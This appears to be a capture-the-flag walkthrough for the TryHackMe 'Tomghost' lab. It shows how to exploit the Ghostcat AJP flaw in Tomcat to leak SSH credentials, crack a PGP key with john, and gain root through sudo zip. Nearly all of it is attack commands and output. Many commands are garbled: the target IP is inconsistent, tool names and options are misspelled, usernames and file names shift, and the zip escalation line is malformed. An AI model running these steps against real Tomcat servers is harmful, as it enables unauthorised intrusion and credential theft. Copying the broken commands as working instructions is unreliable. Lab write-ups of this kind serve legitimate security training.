## Solving the Tomghost on TryHackMe

Login to tryhackme.com and join the room "Tomghost" Collect the target machine information and download the OpenVPN configuration.

Target IP: 10.10.192.140

Config File: sofia.ovpn

Run the Kali machine VM, install OpenVPN if that's not already installed. Run OpenVPN as below

# openvpn sofia.ovpn

Scan with nmap to discover open ports on target

# nmap -sT -sV -O -A 10.10.192.140

Ports State Service Version

8009/tcp open ajp13 Apache Tomcat 9.0.30

Clone ghostcat\_CNVD\_2020\_10487 from GitHub

# git clone https://github.com/cotheway/ghostcat\_CNVD\_2020\_10487.git

Navigate to the "ghostcat\_CNVD\_2020\_10487" and run:

# python ajpshooter.py http://10.10.192.142:8009/WEB-INF/web.xml read

Or, # python ajpshooter.py http://10.10.192.142 8009/WEB-INF/web.xml read

**Output:** 

[ < ][200 200]

<description>

Welcome to Ghostcat

Skyhack: 8730281IKL

<description>

Connect to the target via SSH

# ssh skyhack@10.10.192.142

\$ skyhack@ . \$ ls

Credential.pgp tryhackme.ase

\$ Cd ..

\$ ls

\$ cd merlin [merlin skyhack]

\$ cat user.txt

Navigate to Ghostcat homepage and submit this in Flag.

**On Local Machine** 

> scp skyhack@10.10.192.142:/home/skyhack/\* /home/kali/Documents

- > gpg --import tryhackme.ase
- > gpg2jhon tryhackme.ase > hash
- > john -format = gpg -wordlist = user/share/wordlists/rockyou.txt /hash
- > gpg --decrypt credintial.gpg [merlin : asyus do.....2sj]

## On remote

> su meplin

> Password

meplina > \$ TF = \$(mktemp -u) meplina > \$ sudo zip TF /etc/hosts -T -T

''sh #''

# whoami

root

# cd /root

# ls

root.txt ufw

# cat root.txt

THM (zip\_is\_fake)

Navigate to ghost cat home page and submit the page.